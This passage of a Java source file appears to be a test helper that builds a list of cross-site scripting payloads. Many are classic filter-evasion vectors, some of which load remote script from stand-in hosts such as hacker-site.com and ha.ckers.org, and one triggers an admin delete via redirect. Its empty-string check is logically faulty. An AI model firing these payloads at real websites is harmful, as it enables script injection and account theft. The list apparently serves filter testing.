u006b\\u0069\\u0050\\u006a\\u0077\\u0076\\u005a\\u0047\\u0056\\u006d\\u0063\\u007a\\u0034\\u0067\\u0049\\u0041\\u006f\\u0067\\u0049\\u0043\\u0041\\u0038\\u005a\\u0079\\u0042\\u0076\\u0062\\u006d\\u0078\\u0076\\u0059\\u0057\\u0051\\u0039\\u0049\\u006d\\u0046\\u0073\\u005a\\u0058\\u004a\\u0030\\u004b\\u0044\\u0055\\u0070\\u0049\\u006a\\u0034\\u0067\\u0049\\u0041\\u006f\\u0067\\u0049\\u0043\\u0041\\u0067\\u0049\\u0043\\u0041\\u0067\\u0050\\u0047\\u004e\\u0070\\u0063\\u006d\\u004e\\u0073\\u005a\\u0053\\u0042\\u0076\\u0062\\u006d\\u0078\\u0076\\u0059\\u0057\\u0051\\u0039\\u0049\\u006d\\u0046\\u0073\\u005a\\u0058\\u004a\\u0030\\u004b\\u0044\\u0059\\u0070\\u0049\\u0069\\u0041\\u0076\\u0050\\u0069\\u0041\\u0067\\u0043\\u0069\\u0041\\u0067\\u0049\\u0043\\u0041\\u0067\\u0049\\u0043\\u0041\\u0038\\u0064\\u0047\\u0056\\u0034\\u0064\\u0043\\u0042\\u0076\\u0062\\u006d\\u0078\\u0076\\u0059\\u0057\\u0051\\u0039\\u0049\\u006d\\u0046\\u0073\\u005a\\u0058\\u004a\\u0030\\u004b\\u0044\\u0063\\u0070\\u0049\\u006a\\u0034\\u0038\\u004c\\u0033\\u0052\\u006c\\u0065\\u0048\\u0051\\u002b\\u0049\\u0043\\u0041\\u004b\\u0049\\u0043\\u0041\\u0067\\u0050\\u0043\\u0039\\u006e\\u0050\\u0069\\u0041\\u0067\\u0043\\u006a\\u0077\\u0076\\u0063\\u0033\\u005a\\u006e\\u0050\\u0069\\u0041\\u0067\\u0022\\u003e\\u003c\\u002f\\u0069\\u0066\\u0072\\u0061\\u006d\\u0065\\u003e');\"></img>\n"
                + "</body>\n"
                + "</html>\n"
                + "<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>\n"
                + "<SCRIPT> alert(“XSS”); </SCRIPT>\n"
                + "<BODY ONLOAD=alert(\"XSS\")>\n"
                + "<BODY BACKGROUND=\"javascript:alert('XSS')\">\n"
                + "<IMG SRC=\"javascript:alert('XSS');\">\n"
                + "<IMG DYNSRC=\"javascript:alert('XSS')\">\n"
                + "<IMG LOWSRC=\"javascript:alert('XSS')\">\n"
                + "<IFRAME SRC=”http://hacker-site.com/xss.html”>\n"
                + "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">\n"
                + "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">\n"
                + "<TABLE BACKGROUND=\"javascript:alert('XSS')\">\n"
                + "<TD BACKGROUND=\"javascript:alert('XSS')\">\n"
                + "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">\n"
                + "<DIV STYLE=\"width: expression(alert('XSS'));\">\n"
                + "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://hacker.com/xss.html\">\n"
                + "<EMBED SRC=\"http://hacker.com/xss.swf\" AllowScriptAccess=\"always\">\n"
                + "&apos;;alert(String.fromCharCode(88,83,83))//\\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\n"
                + "&apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()}\n"
                + "&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;\n"
                + "&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\n"
                + "&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;\n"
                + "&lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;\n"
                + "&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;\n"
                + "&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;\n"
                + "&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;\n"
                + "&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;\n"
                + "&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;\n"
                + "&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;\n"
                + "&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;\n"
                + "&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;\n"
                + "&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;\n"
                + "&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;\n"
                + "&lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;\n"
                + "&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;\n"
                + "&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;\n"
                + "Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser\n"
                + "exp/*&lt;XSS STYLE=&apos;no\\xss:noxss(&quot;*//*&quot;);\n"
                + "&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\n"
                + "&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;\n"
                + "&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;\n"
                + "&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;\n"
                + "%BCscript%BEalert(%A2XSS%A2)%BC/script%BE\n"
                + "&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt;\n"
                + "&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;\n"
                + "&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;\n"
                + "&lt;IMG SRC=&quot;mocha:[code]&quot;&gt;\n"
                + "&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;\n"
                + "&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;\n"
                + "&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;\n"
                + "a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);\n"
                + "&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;\n"
                + "&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;\n"
                + "&lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt;\n"
                + "&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;\n"
                + "&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;\n"
                + "&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;\n"
                + "&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;\n"
                + "&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;\n"
                + "&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;\n"
                + "&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;\n"
                + "&lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt;\n"
                + "&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;\n"
                + "&lt;HTML xmlns:xss&gt;\n"
                + "&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;\n"
                + "&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;\n"
                + "&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;\n"
                + "&lt;HTML&gt;&lt;BODY&gt;\n"
                + "&lt;!--[if gte IE 4]&gt;               \n"
                + "&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt;\n"
                + "&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;\n"
                + "&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;\n"
                + "&lt;? echo(&apos;&lt;SCR)&apos;;\n"
                + "&lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt;\n"
                + "&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;\n"
                + "&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;\n"
                + "&lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt;\n"
                + "&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;\n"
                + "&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;\n"
                + "&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;\n"
                + "&lt;DIV STYLE=&quot;background-image:\\0075\\0072\\006C\\0028&apos;\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029&apos;\\0029&quot;&gt;\n"
                + "&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;\n"
                + "&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-\n"
                + "\\&quot;;alert(&apos;XSS&apos;);//\n"
                + "&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\"XSS\");&lt;/SCRIPT&gt;\n"
                + "&lt;STYLE&gt;@im\\port&apos;\\ja\\vasc\\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt;\n"
                + "&lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;\n"
                + "&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;\n"
                + "&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt;\n"
                + "&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt;\n"
                + "&lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D;\n"
                + "perl -e &apos;print &quot;&lt;IMG SRC=java\\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out\n"
                + "perl -e &apos;print &quot;&amp;&lt;SCR\\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\\0IPT&gt;&quot;;&apos; &gt; out\n"
                + "&lt;IMG SRC=&quot; &amp;#14;  javascript:alert(&apos;XSS&apos;);&quot;&gt;\n"
                + "&lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\\]^`=alert(&quot;XSS&quot;)&gt;\n"
                + "&lt;SCRIPT SRC=http://ha.ckers.org/xss.js\n"
                + "&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;";

        for (String x : payload.split("\n")) {
            if (x != null || !x.equals("")) {
                list.add(x);
            }
        }
        return list;
    }

}
